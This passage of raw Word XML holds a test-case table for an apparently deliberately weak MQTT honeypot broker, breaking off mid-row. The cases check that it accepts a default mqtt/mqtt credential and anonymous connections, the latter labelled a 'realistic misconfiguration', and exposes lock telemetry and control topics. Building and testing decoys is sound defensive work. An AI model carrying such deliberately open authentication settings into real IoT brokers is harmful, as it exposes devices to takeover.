                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify CONNECT with a default credential is accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 1883 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Send CONNECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">client sensor1, mqtt / mqtt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK code 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK return code 0; auth event success=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-MQTT-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (Broker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify CONNECT with a wrong credential is refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Send CONNECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">client hack1, root / wrongpass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK code 4 (bad user name or password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK return code 4; connection closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-MQTT-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (Broker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify anonymous CONNECT is allowed (realistic misconfiguration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT_ALLOW_ANONYMOUS=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Send CONNECT without user/password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">client anon1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK code 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CONNACK return code 0; anonymous auth logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-MQTT-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (Broker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify SUBSCRIBE returns retained device telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Connected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SUBSCRIBE lock/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Topic lock/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SUBACK and retained value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SUBACK received; retained lock/status delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-MQTT-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (Broker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a control topic changes the device state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Connected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
